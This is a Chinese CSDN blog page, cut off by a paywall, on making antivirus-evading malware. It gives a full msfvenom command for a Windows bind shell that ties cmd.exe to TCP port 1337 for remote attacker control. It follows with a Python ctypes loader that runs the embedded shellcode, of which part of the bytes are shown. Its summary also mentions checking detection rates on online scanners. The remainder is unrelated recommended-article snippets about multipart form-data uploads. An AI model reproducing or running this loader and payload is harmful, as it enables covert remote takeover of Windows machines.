python webkitformboundary_python 免杀验证

最新推荐文章于 2023-10-11 16:41:35 发布
最新推荐文章于 2023-10-11 16:41:35 发布
阅读量776 收藏
点赞数
文章标签: python webkitformboundary
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34545862/article/details/113640122
版权
本文介绍了如何使用Python和Metasploit生成免杀的Windows bindshell,通过ctypes库执行shellcode,并转换为exe。同时,提供了一个用于上传文件到在线扫描平台验证查杀率的Python脚本,展示了通过文件类型转换提升免杀能力的方法。
摘要由CSDN通过智能技术生成

使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控。

输入命令:

msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c

接着在Python中调用ctypes库,定义一个存在该shellcode的变量,把变量看作是一个C语言的函数,执行它即可。

[

a87c62891c22

复制代码

](javascript:void(0); "复制代码")

#!/usr/bin/python #coding=utf-8

from ctypes import * shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"

"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"

"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"

"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"

"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"

"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"

"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"

"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"

<
最低0.47元/天 解锁文章
PayMillet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python中__dict__属性的详解
XXLoveSHT的博客
08-19 8589
__dict__属性的使用 # -*- coding: utf-8 -*- class A(object): a = 0 name = None b = 1 def __init__(self,name): self.a = 2 self.b = 3 self.name = name def tes...
python __dict__ 详解
hongliryan的专栏
05-08 6448
大多数人在属性访问方面,肯定会知道使用英语句号 “.” 例如(x.name)。一直好奇这玩意是怎么实现的,翻阅python的官方文件,得知,主要是使用 __dict__ 这个属性。 下面看一个简单的例子: class C(object): x = 4 c = C() c.y = 5 print(c.__dict__) # output --> {'y': 5} 注意上面...
python webkitformboundary_python 写oa
weixin_39606003的博客
12-15 1549
requestspayloadapplication/xml使用这种方式上传信息在网上看到的都是上传json 没找到xml在浏览器F12 查看 request payload 信息为------WebKitFormBoundaryPb1p9mxAxlGHdGxAContent-Disposition: form-data; name="subject"2018-07-16 ����һ ��־---...
python webkitformboundary_python上传时包含boundary时的解决方法
weixin_39869791的博客
12-15 2539
python上传时,包含boundary时的处理方式img_url = []upload_pic_url = "http://admin.mdt.oujingroup.cn/uploader/img"headers = {'X-Requested-With': 'XMLHttpRequest',}img_file = open(name, 'rb')multipart_encoder = Mult...
python 文件/图片上传 boundary=----WebKitFormBoundary.....
小王子博客
06-16 4074
python 图片/文件上传
Python爬虫关于网站上传图片: Content-Type: multipart/form-databoundary=----WebKitFormBoundary****************
最新发布
m0_72458808的博客
10-11 4656
boundary=----WebKitFormBoundary****************, 尝试这从其它返回的接口中也找不到它,然后使用 MultipartEncoder(fields=fields, boundary=boundary) 将我们要上传的图片参数,以及生成的boundary传入此类中, 然后使用返回的 m对象,调用器 content_type 属性,就能获取Content-Type 的值了, 这样,我们就能成功模拟发送请求了!我们也一度怀疑是否是在前端JS中生成的,不要着急!
python的name属性_Python关于__name__属性的含义和作用详解
weixin_39640372的博客
11-25 5656
Python关于__name__属性的含义和作用详解Python中的模块(.py文件)在创建之初会自动加载一些内建变量,__name__就是其中之一。Python模块中通常会定义很多变量和函数,这些变量和函数相当于模块中的一个功能,模块被导入到别的文件中,可以调用这些变量和函数。那么这时 __name__ 的作用就彰显了,它可以标识模块的名字,可以显示一个模块的某功能是被自己执行还是被别的文件调用...
python __slot__的用法
qq_35636311的博客
10-16 1万+
__slots__魔法 在Python中,每个类都有实例属性。默认情况下Python用一个字典来保存一个对象的实例属性。这非常有用,因为它允许我们在运行时去设置任意的新属性。 然而,对于有着已知属性的小类来说,它可能是个瓶颈。这个字典浪费了很多内存。Python不能在对象创建时直接分配一个固定量的内存来保存所有的属性。因此如果你创建许多对象(我指的是成千上万个),它会消耗掉很多内存。
python webkitformboundary_python – 使用Multipart / form-data的POST请求.内容类型不正确
weixin_39684052的博客
12-15 2285
我们正在尝试用python编写一个脚本(使用python-requests a.t.m.)来对内容必须是MultipartFormData的站点发出POST请求.当我们手动执行此POST请求时(通过填写网站上的表单并发布),使用wireshark,这就出现了(简短版本):Content-Type: multipart/form-data;Content-Disposition: form-data...
Python requests库处理 multipart/form-data 请求以及 boundary值问题
Enderman_xiaohei的博客
04-20 1万+
原因 爬虫模拟提交文件的时候遇到下面的问题: 点击查看源代码后,发现看不懂: ------WebKitFormBoundarytZTJQrWcjjcJIMVQ Content-Disposition: form-data; name="upload"; filename="好好学习.txt" Content-Type: application/octet-stream ×÷ΪTest --...
python form data request_Python_requests 解决发送form-data格式请求
weixin_39791322的博客
12-11 1099
问题:对接接口,发现对方的接口使用form-data进行数据提交,直接使用requests库的data参数对接,会报参数错误:params = {'timestamp':timestamp,'nonce':nonce,'apikey':APIKEY,'signature': signature}data = {'name': name,'phone': phone,'idnum': idnum,'...
python 处理数据类型data_python处理multipart/form-data类型请求
weixin_39825722的博客
12-05 823
说起content-type为multipart/form-data类型的请求,这个通常我们是用来做文件上传类的。当然也有因为请求数据大过大采用这种类型,那么我们可以像x-www-form-urlencoded类型那样,直接传输数据吗?1. x-www-form-urlencoded类型请求示例:2. muiltpart/form-data类型请求示例:如果form-data类型直接将字典类型的d...
Python请求四种格式
软件测试工程师
03-01 302
1.application/x-www-form-urlencoded 例子:username=ceshi&amp;password=111111 2.application/json 例子:{"username":"ceshi","password":"111111"} 3.text/xml 例子: &lt;?xml version="1.0" encoding="ut
搞定带WebKitFormBoundary post登录
nongcunqq的博客
07-07 2786
关键点post时headers中boundarydata中的boundary数据要一致 随机生成16位大小写字母+数字 参考 https://stackoverflow.com/questions/51349340/recreate-post-request-with-webkitformboundary-using-pythons-requests
巨细!Python爬虫详解(建议收藏)
02-24 2804
爬虫(又称为网页蜘蛛,网络机器人,在 FOAF 社区中间,更经常的称为网页追逐者);它是一种按照一定的规则,自动地抓取网络信息的程序或者脚本。 如果我们把互联网比作一张大的蜘蛛网,那一台计算机上的数据便是蜘蛛网上的一个猎物,而爬虫程序就是一只小蜘蛛,他们沿着蜘蛛网抓取自己想要的猎物/数据。 爬虫的基本流程 很多人学习python,不知道从何学起。 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。 很多已经做案例的人,却不知道如何去学习更加高深的知识。 那么针对这三类人,我
Python 发送 multipart/form-data 数据
slwhy的博客
03-05 1万+
前言 最近做知乎模拟登录的时候,碰到一个很奇怪的参数类型,与一般的键值对不同,大概长这样: ------WebKitFormBoundaryA0Srut8TBztAofvx Content-Disposition: form-data; name="client_id" a3cef7c66a1843f8b3a9e6b1e5162e21 ------WebKitFormBoundaryA0...
Python requests post 提交form-data表单
热门推荐
米Py的自留地
08-22 12万+
问题: 对接接口,发现对方的接口使用form-data进行数据提交,直接使用requests库的data参数对接,会报参数错误: params = { 'timestamp':timestamp, 'nonce':nonce, 'apikey':APIKEY, 'signature': signature } data = { 'name': n...
Python内置_winreg模块操作Windows注册表详解
Python中操作Windows注册表,内置模块`_winreg`提供了一种便捷的方式。`_winreg`模块是Python标准库的一部分,它允许开发者访问Windows注册表,这对于系统级别的配置管理和数据获取非常有用。操作注册表主要有两个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值